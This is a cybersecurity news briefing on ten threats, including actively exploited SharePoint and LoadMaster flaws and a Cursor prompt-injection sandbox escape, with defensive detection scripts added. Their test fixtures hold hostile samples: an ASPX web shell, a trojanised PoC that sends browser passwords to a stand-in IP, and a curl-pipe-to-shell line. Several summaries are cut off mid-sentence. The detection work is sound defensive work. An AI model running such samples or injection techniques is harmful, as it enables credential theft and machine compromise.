Cybersecurity Daily Briefing: July 02, 2026

Coverage: Last 24 hours

Today’s Highlights

This 24h cycle spotlights ongoing risks from unpatched and actively exploited software vulnerabilities, including new high-severity bugs in SharePoint, Progress Kemp LoadMaster, and Adobe ColdFusion, as well as attacker innovation in supply chain and social engineering channels targeting practitioners and end users alike. Themes for today include exploitation of enterprise infrastructure, the use of supply chain and social engineering to target defenders themselves, abuse of trusted SaaS and remote tools for malware delivery, and the imperative for immediate patching on widely-deployed systems.

Table of Contents

  1. SharePoint RCE (CVE‑2026‑45659) added to CISA KEV after active exploitation
  2. Adobe Patches 7 CVSS 10.0 Flaws in ColdFusion and Campaign Classic
  3. Progress Kemp LoadMaster Pre-Auth RCE Flaw Faces Active Exploitation Attempts
  4. New ChocoPoC RAT Targets Vulnerability Researchers via Fake PoC Exploit Repos
  5. Unpatched Argo CD Repo-Server Flaw Could Let Attackers Take Over Kubernetes Clusters
  6. 19-Year-Old Scattered Spider Suspect Extradited to Face U.S. Hacking Charges
  7. SEO-Poisoned Software Sites Abuse ScreenConnect to Deploy AsyncRAT
  8. VEIL#DROP Malware Chain Uses Blogger Platform to Deliver PureLogs Stealer
  9. Ousaban Banking Trojan Targets Iberian Bank Users with Fake PDF Lures
  10. Critical Cursor Flaws Could Let Prompt Injection Escape Sandbox and Run Commands

Top Stories


SharePoint RCE (CVE‑2026‑45659) added to CISA KEV after active exploitation

Source: The Hacker News | Risk: Critical | Impacted: SharePoint administrators, Internal collaboration system owners, Enterprise compliance teams

Summary: CISA has added CVE‑2026‑45659, a high‑severity SharePoint remote code execution flaw (CVSS 8.8), to its Known Exploited Vulnerabilities catalog based on evidence of active exploitation.

Why it matters: Successful exploitation of an actively abused SharePoint RCE flaw may provide attackers direct access to sensitive data and an entry point for lateral movement across intranets.

Practitioner Perspective

With CVE‑2026‑45659 now listed in CISA KEV and confirmed as exploited in the wild, organizations running SharePoint, especially instances reachable from the internet, should move this patch to the top of the queue. The window between exploitation and detection on SharePoint servers can be narrow, and once in, attackers typically drop web shells and pivot toward business data. Patching alone does not evict an attacker who is already present, so checking for evidence of compromise matters as much as patch compliance.

Recommended Actions

  • Patch all SharePoint servers for CVE-2026-45659 immediately, including those internal to the domain
  • Search for indicators of compromise (web shells, new admin accounts, unexpected outbound traffic) on servers that could have been exposed prior to patching
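One way to act on the second bullet, as an added example that is not part of the article and not CISA's or Microsoft's tooling: a post-patch triage pass over a SharePoint/IIS web root that keeps server-side scripts modified inside the exposure window and scores each for constructs a shipped SharePoint page rarely contains. The root path, the window length, the indicator list and its weights are assumptions to tune per estate; the sample tree is constructed inside the script.

```python
"""Post-patch web shell triage for a SharePoint/IIS web root.

Added example, not from the article, CISA or Microsoft. Walks a web root,
keeps server-side scripts modified inside the exposure window, and scores
each for constructs a shipped SharePoint page rarely contains. Root path,
window length and pattern weights are assumptions to tune per estate.
"""
import os
import re
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path

# Extensions IIS hands to the ASP.NET pipeline, i.e. files that execute on request.
SCRIPT_EXTS = {".aspx", ".ashx", ".asmx", ".asax", ".svc", ".soap"}

# (indicator, regex, weight). Weights are an assumption; calibrate on a known-clean server.
SHELL_PATTERNS = [
    ("request_input", re.compile(r"\bRequest\s*[\[.(]", re.I), 1),
    ("process_start", re.compile(r"System\.Diagnostics\.Process|Process\.Start", re.I), 3),
    ("shell_binary", re.compile(r"cmd\.exe|powershell(?:\.exe)?", re.I), 3),
    ("load_encoded", re.compile(r"FromBase64String|Assembly\.Load", re.I), 2),
    ("key_material", re.compile(r"MachineKey|ValidationKey|DecryptionKey", re.I), 2),
    ("outbound_net", re.compile(r"WebClient|HttpWebRequest|TcpClient", re.I), 1),
]


def score_content(text: str) -> tuple:
    """Return (score, [indicator names]) for one file's source text."""
    score, hits = 0, []
    for name, rx, weight in SHELL_PATTERNS:
        if rx.search(text):
            score += weight
            hits.append(name)
    return score, hits


def triage_web_shells(root: Path, since: datetime, threshold: int = 4) -> list:
    """Server-side scripts under `root` modified at or after `since` whose
    content score reaches `threshold`, highest score first."""
    since_ts = since.timestamp()
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTS:
            continue
        mtime = path.stat().st_mtime
        if mtime < since_ts:
            continue  # predates the window; a baseline diff should still cover it
        score, hits = score_content(path.read_text(errors="replace"))
        if score >= threshold:
            findings.append({
                "path": str(path),
                "modified": datetime.fromtimestamp(mtime, timezone.utc).isoformat(timespec="seconds"),
                "score": score,
                "hits": hits,
            })
    return sorted(findings, key=lambda f: -f["score"])


def demo() -> list:
    """Constructed tree, not a real server: a benign layout page, a shell-like
    page written inside the window, and an identical shell-like page whose
    mtime predates the window. Returns (file name, score) per finding."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "TEMPLATE" / "LAYOUTS"  # assumed layout of the web root
        root.mkdir(parents=True)
        (root / "settings.aspx").write_text(
            '<%@ Page Language="C#" %><asp:Label runat="server" Text="Site settings" />')
        shell_src = ('<%@ Page Language="C#" %><% var p = new System.Diagnostics.Process(); '
                     'p.StartInfo.FileName = "cmd.exe"; '
                     'p.StartInfo.Arguments = "/c " + Request["c"]; p.Start(); %>')
        (root / "upload_handler.aspx").write_text(shell_src)
        old = root / "legacy_handler.aspx"
        old.write_text(shell_src)
        old_ts = (datetime.now(timezone.utc) - timedelta(days=30)).timestamp()
        os.utime(old, (old_ts, old_ts))
        window_start = datetime.now(timezone.utc) - timedelta(days=7)
        return [(Path(f["path"]).name, f["score"]) for f in triage_web_shells(root, window_start)]


if __name__ == "__main__":
    print(demo())
```

Run it against the real web root with `since` set to the earliest plausible exposure date, then review every hit by hand; the old-file branch is deliberately skipped here because a shell planted before the window is a job for a file-integrity baseline, not a recency filter.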

Adobe Patches 7 CVSS 10.0 Flaws in ColdFusion and Campaign Classic

Source: The Hacker News | Risk: Critical | Impacted: ColdFusion application owners, Marketing teams using Campaign Classic, Public-facing web application operators

Summary: Adobe has released patches for multiple maximum-severity security flaws impacting Adobe ColdFusion and Adobe Campaign Classic. The ColdFusion update “resolves critical and important vulnerabilities that could lead to arbitrary code execution, privilege escalation, arbitrary file system read, and security feature bypass,” Adobe said in an alert released Tuesday. The vulnerabilities are listed.

Why it matters: Critical vulnerabilities in business-critical Adobe software could allow remote code execution and privilege escalation, putting sensitive systems and customer data at immediate risk.

Practitioner Perspective

Organizations running Adobe ColdFusion and Campaign Classic face seven CVSS 10.0 vulnerabilities, each offering a route to complete system compromise. Internet-facing ColdFusion has a long history of being mass-scanned once patches are public, so unpatched instances should be expected to draw opportunistic and ransomware-affiliated attention quickly. Realistically, unmanaged or forgotten application servers are most at risk, which makes discovery as important as the patch itself: an advisory like this has to be matched against a complete inventory, not only the servers IT already knows about.

Recommended Actions

  • Deploy the Adobe ColdFusion and Campaign Classic updates addressing the seven CVSS 10.0 flaws in this week's advisory
  • Uncover and inventory all ColdFusion and Campaign Classic instances, including those outside standard IT control

Progress Kemp LoadMaster Pre-Auth RCE Flaw Faces Active Exploitation Attempts

Source: The Hacker News | Risk: Critical | Impacted: Network infrastructure teams, Organizations with public-facing Progress Kemp LoadMasters, Hybrid cloud network operators

Summary: A recently disclosed critical security flaw impacting Progress Kemp LoadMaster is seeing active exploitation attempts, according to an advisory from eSentire’s Threat Response Unit (TRU). The Canadian cybersecurity company said it identified exploitation attempts targeting CVE-2026-8037 (CVSS score: 9.6), an operating system (OS) command injection flaw that could be exploited to achieve unauthenticated remote code execution.

Why it matters: Active exploitation of an unauthenticated command injection vulnerability in a widely deployed load balancer creates a high risk of disruptive or covert compromise, especially in environments with exposed management interfaces.

Practitioner Perspective

Enterprises using Progress Kemp LoadMaster appliances must assume that attackers are actively scanning for CVE-2026-8037 and will exploit unpatched devices with exposed management interfaces. Because the flaw yields pre-authentication remote code execution, incident response teams should treat any exposed appliance as potentially compromised until log review and integrity checks say otherwise. Load balancers sit in the traffic path, terminate TLS and hold credentials for backend services, yet they are often outside routine security monitoring, which makes them an attractive foothold for lateral movement. There is no acceptable reason to defer remediation.

Recommended Actions

  • Immediately deploy the vendor patch for CVE-2026-8037 to all Progress Kemp LoadMaster instances
  • Identify and restrict network exposure of all LoadMaster management interfaces to trusted IPs only

Emerging Signals


New ChocoPoC RAT Targets Vulnerability Researchers via Fake PoC Exploit Repos

Source: The Hacker News | Risk: High | Impacted: Vulnerability researchers, Red/purple team operators, Security automation engineers

Summary: Attackers are hiding a data-stealing trojan inside fake exploit code aimed at the people who hunt bugs for a living. The malware, called ChocoPoC, travels in Python proof-of-concept (PoC) repositories on GitHub that claim to exploit hot new CVEs. Run one, and it quietly lifts your saved passwords, browser cookies, and files, then hands the attacker a shell on your.

Why it matters: Malicious PoC repositories deliver remote access tools that can exfiltrate credentials and project data, putting both individual researchers and the organizations they serve at direct risk.

Practitioner Perspective

Vulnerability researchers and application security teams, especially those integrating third-party PoCs or automation scripts, are prime targets here. Threat actors recognize the growing reliance on public exploit code and are actively poisoning GitHub repositories with loaders and RATs like ChocoPoC. This attack narrows the gap between research and compromise: an unvetted script can escalate in seconds from local credential theft to persistent attacker access. Security teams must treat public PoCs, especially those claiming to exploit new CVEs, as potentially hostile, and rethink how they validate and sandbox code before execution.

Recommended Actions

  • Isolate and analyze all downloaded PoCs for new CVEs in disposable VMs before any use on production or research endpoints
  • Hunt for ChocoPoC RAT activity such as abnormal Python processes, connections to known C2 infrastructure, and unexpected credential access on systems used for exploit testing
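A static pre-screen is a cheap first gate before a PoC is even copied into the disposable VM. The following is an added example, not ChocoPoC, not code from the article and not from any GitHub repository: it parses a Python PoC with `ast`, never imports or runs it, and flags the traits that distinguish a trojanised PoC from a genuine one (decode-then-exec of a hidden stage, shell spawning, reads of browser or SSH secret stores, hard-coded endpoints a PoC that takes its target from the command line has no reason to contain). The indicator lists and verdict thresholds are assumptions; both sample scripts are constructed.

```python
"""Static pre-screen for a third-party Python PoC before it runs anywhere.

Added example: not ChocoPoC and not code from the article or any repository.
Parses with `ast`, never executes. Indicator lists are assumptions to extend.
"""
import ast
import re

EXEC_CALLS = {"exec", "eval", "compile", "__import__", "importlib.import_module"}
DECODE_CALLS = {"base64.b64decode", "base64.b32decode", "base64.b85decode", "zlib.decompress",
                "bytes.fromhex", "codecs.decode", "marshal.loads", "pickle.loads"}
SHELL_CALLS = {"os.system", "os.popen", "subprocess.Popen", "subprocess.run",
               "subprocess.call", "subprocess.check_output"}
# Fragments of paths where browsers, SSH and cloud CLIs keep secrets.
SECRET_PATH_HINTS = ("Login Data", "Cookies", "Local State", ".ssh", "id_rsa",
                     ".aws/credentials", "Keychain", ".kdbx")
# A bare IPv4 address, or an http(s) URL with a real host, inside a string literal.
HARDCODED_ENDPOINT = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b|https?://[\w-]+(?:\.[\w-]+)+")


def _alias_map(tree):
    """Local name -> qualified name, so `import subprocess as sp` still resolves."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name.split(".")[0]] = a.name if a.asname else a.name.split(".")[0]
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _qualname(node, aliases):
    """'pkg.mod.func' for a Name/Attribute chain with its head de-aliased, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))


def screen_poc(source: str) -> dict:
    """Return {'verdict': 'block'|'review'|'pass', 'findings': [(kind, line, detail)]}."""
    tree = ast.parse(source)
    aliases = _alias_map(tree)
    # Variables assigned straight from a decode call: exec() of one is a packed stage-2 loader.
    tainted = set()
    for node in ast.walk(tree):
        if (isinstance(node, ast.Assign) and isinstance(node.value, ast.Call)
                and _qualname(node.value.func, aliases) in DECODE_CALLS):
            tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _qualname(node.func, aliases)
            if name in EXEC_CALLS:
                inner = {_qualname(c.func, aliases) for c in ast.walk(node)
                         if isinstance(c, ast.Call) and c is not node}
                via_var = any(isinstance(a, ast.Name) and a.id in tainted for a in node.args)
                kind = "decode_then_exec" if (inner & DECODE_CALLS or via_var) else "dynamic_exec"
                findings.append((kind, node.lineno, name))
            elif name in SHELL_CALLS:
                shell = any(k.arg == "shell" and getattr(k.value, "value", None) is True
                            for k in node.keywords)
                findings.append(("shell_spawn", node.lineno, name + (" shell=True" if shell else "")))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            hint = next((h for h in SECRET_PATH_HINTS if h in node.value), None)
            if hint:
                findings.append(("secret_path", node.lineno, hint))
            m = HARDCODED_ENDPOINT.search(node.value)
            if m:
                findings.append(("hardcoded_endpoint", node.lineno, m.group(0)))
    kinds = {k for k, _, _ in findings}
    if kinds & {"decode_then_exec", "secret_path"}:
        verdict = "block"
    elif kinds & {"dynamic_exec", "shell_spawn", "hardcoded_endpoint"}:
        verdict = "review"
    else:
        verdict = "pass"
    return {"verdict": verdict, "findings": sorted(findings, key=lambda f: f[1])}


# Constructed samples, not real repositories. The first is what a PoC should look like:
# target from argv, traffic only to that target.
BENIGN_POC = '''
import sys, requests
target = sys.argv[1]
r = requests.get(f"http://{target}/vuln?id=1", timeout=5)
print(r.status_code)
'''
TROJANISED_POC = '''
import base64, os, socket
import subprocess as sp
def exploit(target):
    stage2 = base64.b64decode("cHJpbnQoJ3N0YWdlMicpCg==")
    exec(stage2)
    db = os.path.expanduser("~/AppData/Local/Google/Chrome/User Data/Default/Login Data")
    s = socket.create_connection(("203.0.113.7", 4444))
    s.send(open(db, "rb").read())
    sp.Popen("whoami", shell=True)
'''
```

A "block" verdict should never be overridden by hand-waving that the PoC "needs" the construct; a "review" verdict means reading the flagged lines before detonating in the VM. Obfuscation beyond simple aliasing (string-built attribute names, `getattr` chains) will slip past this, which is exactly why the VM stays in the loop.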

Unpatched Argo CD Repo-Server Flaw Could Let Attackers Take Over Kubernetes Clusters

Source: The Hacker News | Risk: High | Impacted: Kubernetes operators, DevOps teams, CI/CD platform owners

Summary: Argo CD, a widely used tool for deploying software to Kubernetes, has an unpatched flaw in its repo-server component that lets an unauthenticated attacker run code, provided they can reach the component’s internal network port. Synacktiv, which found the bug, says it can lead to a full cluster takeover. There is no fix and no CVE. The firm says it.

Why it matters: A widely used software deployment platform remains vulnerable to internal RCE, creating an opportunity for lateral movement or full Kubernetes cluster compromise in CI/CD environments.

Practitioner Perspective

Any organization running Argo CD should treat this as an immediate exposure, especially as there is no CVE or vendor patch yet. Repo-server is the component that clones Git repositories and renders the manifests Argo CD applies, so an attacker who can reach its internal port, whether through a misconfigured service exposure or from a foothold elsewhere in the cluster, can run code in the heart of the deployment pipeline and, as Synacktiv reports, escalate to the whole cluster. CI/CD platforms like Argo CD are frequent pivots in real-world supply chain attacks. Until an official update is published, minimizing repo-server exposure and scrutinizing which workloads can talk to it is the critical control.

Recommended Actions

  • Restrict network access to the Argo CD repo-server internal port to the Argo CD components that actually call it (for example with a Kubernetes NetworkPolicy), rather than leaving it open to the cluster network
  • Review firewall rules and segmentation for any CI/CD infrastructure that could reach repo-server

19-Year-Old Scattered Spider Suspect Extradited to Face U.S. Hacking Charges

Source: The Hacker News | Risk: Medium | Impacted: Corporate IT environments, Large enterprises, SOC analysts monitoring for social engineering

Summary: A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1. Peter Stokes, 19, a dual U.S. and Estonian citizen, appeared in a Chicago federal court on June 30, where a judge ordered him held in custody. Finnish.

Why it matters: The extradition underscores ongoing legal action against members of active, high-impact threat groups, which may disrupt but will not deter broader affiliate-driven operations targeting enterprises.

Practitioner Perspective

While the arrest of a Scattered Spider member is notable, the group’s decentralized nature means organizations should remain on high alert for ongoing activity by other affiliates. These actors favor social engineering and abuse of remote access into enterprise systems. Expect continued phishing, callback scams, and TTPs designed to bypass MFA and pivot into high-value SaaS or cloud platforms. Defensive focus should remain on identity security and rapid detection of credential misuse, not just on tracking specific individuals.

Recommended Actions

  • Reinforce user security awareness, emphasizing current Scattered Spider TTPs like callback phishing
  • Hunt for signs of lateral movement and MFA bypass in admin and cloud login logs

SEO-Poisoned Software Sites Abuse ScreenConnect to Deploy AsyncRAT

Source: The Hacker News | Risk: High | Impacted: Corporate desktops, Managed workstations, IT helpdesks

Summary: Unknown threat actors are leveraging the ScreenConnect remote access tool as a way to deploy and execute AsyncRAT. Kaspersky said the activity is part of a “massive, multi-domain, multi-language” campaign that distributes malicious installer archives hosted on spoofed websites. These installers masquerade as popular software like OBS Studio, DNS Jumper, DS4Windows, and Bandicam, among others.

Why it matters: Malware distributed through SEO-manipulated installer sites exploits user trust and can evade standard email-based controls, expanding the delivery surface for AsyncRAT and persistent access.

Practitioner Perspective

IT staff and end users searching for legitimate software like OBS Studio or DNS Jumper are being lured onto convincingly spoofed download sites, where installers instead deliver AsyncRAT via ScreenConnect. Because the lure is a search result rather than an email, mail-gateway controls never see it, and initial access shifts to the user’s browser and download behavior. Security teams need active detection for both AsyncRAT and unexpected ScreenConnect client installs, particularly in environments where users hold local install rights.

Recommended Actions

  • Block or closely monitor ScreenConnect client installs and outbound relay connections that do not belong to an IT-operated ScreenConnect instance
  • Deploy EDR detections for AsyncRAT signatures and command-and-control activity

VEIL#DROP Malware Chain Uses Blogger Platform to Deliver PureLogs Stealer

Source: The Hacker News | Risk: Medium | Impacted: Small business and enterprise end users, Staff with browser-saved credentials, Organizations with weak web filtering

Summary: Cybersecurity researchers have flagged a new multi-stage malware delivery attack chain that uses social engineering and Blogger pages to deliver an information stealer called PureLogs. The activity has been codenamed VEIL#DROP by Securonix. It’s suspected that the initial payloads are distributed either via spear-phishing or a drive-by compromise, which occurs when an unsuspecting user lands on.

Why it matters: Browser-based delivery via social engineering and cloud hosting services enables attackers to bypass many legacy security layers and directly target user credentials and browser-stored secrets.

Practitioner Perspective

Attackers are abusing Google’s Blogger platform to serve multi-stage malware, with initial infection vectors linked to spear-phishing or drive-by web visits. The PureLogs stealer extracts sensitive browser data, posing risks for business email compromise and access token theft. This demonstrates ongoing threat actor adaptation: trusted platforms like Blogger are again viable malware delivery vectors, and targeted users may be unaware of compromise. Detection must focus on endpoint telemetry and cloud-based web filtering attuned to malicious Blogger domains.

Recommended Actions

  • Expand web filtering policies to block access to known malicious Blogger domains and file downloads
  • Enable browser and EDR telemetry to alert on non-corporate binaries dropped from Blogger pages

Ousaban Banking Trojan Targets Iberian Bank Users with Fake PDF Lures

Source: The Hacker News | Risk: Medium | Impacted: Iberian financial institutions, Windows endpoint users in Spain/Portugal, Corporate finance and treasury staff

Summary: A Brazilian banking trojan called Ousaban is going after Windows users who bank in Spain and Portugal. Fortinet’s FortiGuard Labs identified the campaign in May 2026. It opens with a phishing PDF disguised as a corrupted file, checks that the visitor is really in Spain or Portugal, and hides its real payload inside an image. The goal is the usual one: steal.

Why it matters: Targeted banking malware campaigns increase the threat to financial accounts of users in specific geographies, amplifying the operational risk for institutions serving those markets.

Practitioner Perspective

The Ousaban campaign targets Windows users in Spain and Portugal with a PDF lure posing as a corrupted file, a geolocation check that withholds the payload from visitors outside those countries, and a final stage hidden inside an image, all of which blunt basic email filtering and sandbox detonation outside the target region. For any organization with a local presence or customers in these regions, credential theft may directly enable fraud or lateral attacks into corporate banking systems. Security teams need more than generic anti-malware to disrupt localized campaigns that rely on language and regional checks. Critical controls include geo-aware phishing defense and account activity monitoring.

Recommended Actions

  • Deploy advanced phishing controls tuned for Spanish and Portuguese lures attached as PDFs
  • Monitor regional login activity for anomalous banking sessions and credential reuse

Critical Cursor Flaws Could Let Prompt Injection Escape Sandbox and Run Commands

Source: The Hacker News | Risk: High | Impacted: Development teams using Cursor, Source code repository owners, Software supply chain defenders

Summary: Two flaws in Cursor, an AI code editor, could let a single, ordinary-looking prompt break out of the editor’s safety sandbox and run any command on a developer’s computer. There is no click to fall for and no approval box to ignore. Cato AI Labs found the pair and named them DuneSlide. They are tracked as CVE-2026-50548 and CVE-2026-50549, both rated 9.8 out of 10.

Why it matters: Flaws in AI-based developer tooling create novel attack paths for code execution on developer endpoints, likely compromising source code, credentials, and supply chain artifacts.

Practitioner Perspective

Cursor, the AI-driven code editor, contains two critical vulnerabilities (CVE-2026-50548 and CVE-2026-50549) that allow prompt content to escape the sandbox and run arbitrary commands, with no click or approval step for the developer to refuse. Because the editor ingests untrusted text by design (repository files, issues, documentation pulled into context), malicious prompt content alone can silently compromise developer machines, and a compromised developer endpoint puts source, credentials and build artifacts at risk deep in the SDLC. Any organization trialing or deploying Cursor should suspend its use until fixed builds for both CVEs are verified and deployed, and review endpoint posture on developer systems.

Recommended Actions

  • Halt all use of Cursor AI code editor until fixes for CVE-2026-50548 and CVE-2026-50549 are verified and deployed
  • Audit developer endpoint telemetry for unexplained command execution traceable to Cursor sessions
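The two telemetry actions above (unexpected ScreenConnect clients from the AsyncRAT item, and shells spawned from Cursor from this one) can share one hunt over process-creation events. The block below is an added example, not from the article, Kaspersky, Cato AI Labs or the vendors: it flags ScreenConnect clients whose relay host is not on IT's approved list, and Cursor-parented shells whose command line looks like download-and-execute or concealed execution rather than a developer's interactive terminal. The event shape is a simplified EDR record constructed here; the `h=` launch parameter used to recover the relay host, the Cursor image names and the approved-relay list are assumptions to verify against your own installs.

```python
"""Process-telemetry hunt: ScreenConnect clients on unapproved relays, and
shells spawned from Cursor that look like download-and-execute.

Added example, not from the article or the vendors. Events are constructed
EDR-style process-creation records; relay parameter, image names and the
approved-relay list are assumptions to verify locally.
"""
import re

APPROVED_RELAYS = {"support.example-corp.internal"}  # assumption: relays IT operates
SCREENCONNECT_IMAGES = {"screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"}
CURSOR_IMAGES = {"cursor.exe", "cursor"}  # assumption: verify on your builds
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "bash", "sh", "zsh", "dash"}

# Command-line traits of fetch-and-run or concealed execution; an interactive terminal has none.
SUSPICIOUS_CMD = [
    ("encoded_powershell", re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_exec", re.compile(
        r"\b(?:curl|wget|iwr|Invoke-WebRequest|certutil)\b.*(?:\|\s*(?:sh|bash|iex)\b|-urlcache)"
        r"|\biex\s*\(|Invoke-Expression", re.I)),
    ("hidden_window", re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I)),
]


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _relay_host(cmdline: str):
    """ScreenConnect client arguments carry the relay as `h=<host>` (assumption)."""
    m = re.search(r"[?&]h=([^&\s\"']+)", cmdline)
    return m.group(1).lower() if m else None


def hunt(events: list) -> list:
    """Return one alert per event that trips a rule, in event order."""
    alerts = []
    for ev in events:
        image = _basename(ev["image"])
        parent = _basename(ev.get("parent_image", ""))
        cmd = ev.get("cmdline", "")
        if image in SCREENCONNECT_IMAGES:
            relay = _relay_host(cmd)
            if relay not in APPROVED_RELAYS:  # relay=None (no h= at all) is also unapproved
                alerts.append({"rule": "screenconnect_unapproved_relay", "host": ev["host"], "relay": relay})
        if parent in CURSOR_IMAGES and image in SHELL_IMAGES:
            hits = [name for name, rx in SUSPICIOUS_CMD if rx.search(cmd)]
            if hits:
                alerts.append({"rule": "cursor_spawned_shell", "host": ev["host"],
                               "indicators": hits, "cmdline": cmd})
    return alerts


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"host": "WS-042", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.ClientService.exe",
     "cmdline": '"ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=support.example-corp.internal&p=8041&s=8a3f"'},
    {"host": "WS-117", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files (x86)\ScreenConnect Client (9f8e7d)\ScreenConnect.ClientService.exe",
     "cmdline": '"ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.obs-studio-free-download.test&p=8041&s=77c1"'},
    {"host": "DEV-07", "parent_image": r"C:\Users\dev\AppData\Local\Programs\cursor\Cursor.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc UQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQ=="},  # filler base64
    {"host": "DEV-07", "parent_image": r"C:\Users\dev\AppData\Local\Programs\cursor\Cursor.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe", "cmdline": "pwsh.exe -NoLogo"},
    {"host": "DEV-12", "parent_image": "/usr/share/cursor/cursor", "image": "/bin/bash",
     "cmdline": "bash -c 'curl -s http://203.0.113.9/setup.sh | sh'"},
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```

The Cursor rule deliberately does not fire on every shell the editor spawns, since agent features and integrated terminals do that constantly; it fires on the command-line shapes a developer's own terminal never produces. Feed it your EDR's process events mapped to the same four fields and tune the relay list before trusting a quiet result.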

Defensive Actions

  • Patch all SharePoint servers for CVE-2026-45659 immediately, including internal servers
  • Deploy all security updates for Adobe ColdFusion and Campaign Classic addressing July 2026 CVSS 10.0 flaws
  • Immediately patch Progress Kemp LoadMaster appliances for CVE-2026-8037 and restrict their management interfaces
  • Isolate and verify all PoCs for new CVEs in contained VMs prior to use on production or sensitive endpoints
  • Restrict network access to Argo CD repo-server and review segmentation in CI/CD environments
  • Hunt for signs of ChocoPoC RAT (abnormal Python processes, credential access) on research and security endpoints
  • Enable EDR detections for AsyncRAT and ScreenConnect command-and-control activity on user machines
  • Expand phishing and web filtering tailored to region/language context where targeted malware campaigns are active
  • Audit software asset inventories to uncover ColdFusion/Campaign Classic servers outside normal IT visibility
  • Reinforce user security awareness, especially regarding tactics employed by groups like Scattered Spider

What We’re Watching

Defenders should keep close attention on patch compliance for the SharePoint and Progress Kemp LoadMaster flaws, both of which are facing active exploitation, and for the maximum-severity Adobe ColdFusion and Campaign Classic bugs, which are prime candidates for rapid weaponization. Campaigns leveraging SEO poisoning for malware delivery, together with the poisoning of exploit proof-of-concept code aimed at researchers, represent rapidly evolving methods targeting both security practitioners and end users. Watch for additional advisories on interim mitigations for Argo CD and for further developments in high-profile threat actor arrests and any resulting operational changes.


Categories: Cybersecurity Blog, Cybersecurity News